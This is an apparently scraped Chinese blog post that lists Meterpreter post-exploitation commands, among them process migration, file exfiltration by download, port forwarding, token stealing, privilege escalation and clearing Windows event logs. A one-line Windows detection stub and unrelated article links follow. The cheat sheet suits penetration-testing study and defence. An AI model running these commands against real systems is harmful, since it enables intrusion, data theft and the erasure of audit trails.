渗透中Meterpreter基本操作和对应的windows上的排查或者现象
Meterpreter的简单介绍
Meterpreter 是MSF自带一个强大的SHELL,可以执行很多功能。
Meterpreter SHELL
基本操作
meterpreter>background #session隐藏到后台
meterpreter>bgkill #杀掉后台的一个meterpreter
meterpreter>bglist #列出后台的meterpreter
meterpreter>bgrun #运行后台的一个meterpreter
msf> sessions -l #查看回话session的list
msf> sessions 4 #切回四号回话,用于和background反操作
查看系统信息
meterpreter>sysinfo #获取系统信息
meterpreter>getuid #获取当前注入的用户名称
转移注入进程
meterpreter>ps #查看进程list
meterpreter>migrate pid #转移注入点的继承
转移注入进程后,源进程被杀掉,并不影响meterpreter的会话
文件和路径类的操作
meterpreter>ls
meterpreter>pwd
meterpreter>mkdir
meterpreter>mv
meterpreter>rm
meterpreter>rmdir
#以上常见操作不在赘述
meterpreter>show_mount #展示磁盘情况
meterpreter>search -d c:\\ -f *.doc # -d 路径 -f 文件名模式 搜索文件 例如搜索日志文件 *.evtx
meterpreter>upload /localpath/localfile c:\\remote\\remotepath #上传文件
meterpreter>download c:\\xxx\xxx.xxx /root/... #下载文件
meterpreter>edit xxx #编辑文件,VIM的
网络配置及其命令
meterpreter>arp #展示arp
meterpreter>getproxy #获取代理信息
meterpreter>ifconfig(ipconfig) #查看网卡信息
meterpreter>route #打印路由
meterpreter>netstat #查看网络连接情况
meterpreter>resolve #dns解析
meterpreter>portfwd #端口转发portfwd add -l 1122 -p 3389 -r 192.168.250.176
系统操作及其命令
meterpreter>shell #获取cmdshell
meterpreter>clearev #清除event log
meterpreter>execute #执行command
meterpreter>getpid(getuid、getdsid)
meterpreter>getpriv #提权
meterpreter>shutdown #关机
meterpreter>reboot #重启
meterpreter>steal_token #窃取token
meterpreter>sysinfo #系统信息
meterpreter>localtime #获取系统时间
用户接口指令操作
Windows排查
进程
任务管理器看不到,但是tasklist和netstat 可以看到
渗透中Meterpreter基本操作和对应的windows上的排查或者现象的更多相关文章
- 在Windows上安装PHP(将PHP加载到Apache中)
第一步:在 windows.php.net 下载软件包 第二步:解压压缩包,将解压后的目录放到指定目录并重命名 第三步: 创建PHP配置文件,修改Apache配置文件(httpd.conf),将PHP ...
- Windows上的Linux容器
翻译自:https://docs.microsoft.com/en-us/virtualization/windowscontainers/deploy-containers/linux-contai ...
- 内网渗透中的反弹Shell与端口转发
from:https://www.91ri.org/9367.html Web渗透中的反弹Shell与端口转发 php需未禁用exec函数一:生成php反弹脚本msf > msfpayload ...
- 渗透中Necat的另类用法
Necat 是一个伟大而实用的用于 TCP 和 UPD 网络连接协议的读写程序.同时 Necat 也被誉为网络中的瑞士军刀,在许多黑客教程中 Necat 也被广泛使用.Necat 最常见用途是设置反向 ...
- Memcached在.Net中的基本操作
Memcached在.Net中的基本操作 一.Memcached ClientLib For .Net 首先,不得不说,许多语言都实现了连接Memcached的客户端,其中以Perl.PHP为主. 仅 ...
- Vim中的基本操作
Vim中的基本操作 vim介绍.实验知识点.Vim中的六种基本模式 2.1 vim 6种模式介绍 从vi衍生出来的Vim具有多种模式,这种独特的设计容易使初学者产生混淆.几乎所有的编辑器都会有插入和执 ...
- 【转载】【网络安全】渗透中 PoC、Exp、Payload 与 Shellcode 的区别
原文地址 渗透中 PoC.Exp.Payload 与 Shellcode 的区别 概念 PoC,全称"Proof of Concept",中文"概念验证",常指 ...
- Notepad++中调用cl.exe编译器(Windows)
Notepad++中调用cl.exe编译器(Windows) 近来在notepad++中写代码,写完后总是习惯性的想去VS里面编译一下,看看代码是否有误.但有时候一些零碎的小文件总是懒得再VS中打开, ...
- .pages怎么在windows上打开?Windows下打开在Mac中编辑的.pages文件方法
.pages怎么在windows上打开?Windows下打开在Mac中编辑的.pages文件方法 1.最简单的方法是修改后缀名为.zip然后解压,解压后就可以看到一张图片,这个就是文档内容了. 2.更 ...
随机推荐
- VS2010 工程设置
本篇文章的主要内容转载自 http://blog.csdn.net/waitforfree/article/details/8622059 ,感谢博主的辛苦劳动.此处,对比较重要的部分,进行进一 ...
- 关于Struts2的文件上传
要实现Struts2框架的文件上传,需要用到2个jar包 commons-fileupload-1.2.2.jar commons-io-2.0.1.jar 由于文件解析Struts2内部已经帮我们做 ...
- 9 云计算系列之Cinder的安装与NFS作为cinder后端存储
preface 在前面我们知道了如何搭建Openstack的keystone,glance,nova,neutron,horizon这几个服务,然而在这几个服务中唯独缺少存储服务,那么下面我们就学习块 ...
- PDF文件可以转换成txt文档吗
PDF是一种便携式的文件格式,传送和阅读都非常方便,是Adobe公司开发的跨平台文件格式,它无论在哪种打印机上都可以保证精确的颜色和准确的打印效果.可是有点遗憾的是PDF格式一般不能在手机上打开,或者 ...
- oracle创建HR示例数据库脚本hr_main.sql分享
需求描述: 今天一同事想要在测试库上进行SQL练习,帮忙安装下这个示例数据库,在此记录下. 操作过程: 1.上传hr_main.sql脚本(10g 11g都可用) 脚本下载链接: https://pa ...
- UML类图关系(转,添加了实例)
UML类图关系(泛化 .继承.实现.依赖.关联.聚合.组合) 在UML类图中,常见的有以下几种关系: 泛化(Generalization), 实现(Realization),关联(Associati ...
- flexbox子盒子order属性
<!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8&quo ...
- ios开发之--比较两个数组里面的值是否相同
比较两个数组里面的内容是否相同,代码如下: NSArray *array1 = [NSArray arrayWithObjects:@"a", @"b", @& ...
- 文件完整性hash验证demo(python脚本)
一个简单的文件完整性hash验证脚本 #!/usr/bin/env python # -*- coding: utf- -*- import os import hashlib import json ...
- Senium 简介
有时候我们在用 requests 抓取页面的时候,得到的结果可能和在浏览器中看到的不一样,在浏览器中可以看到正常显示的页面数据,但是使用 requests 得到的结果并没有.这是因为 requests ...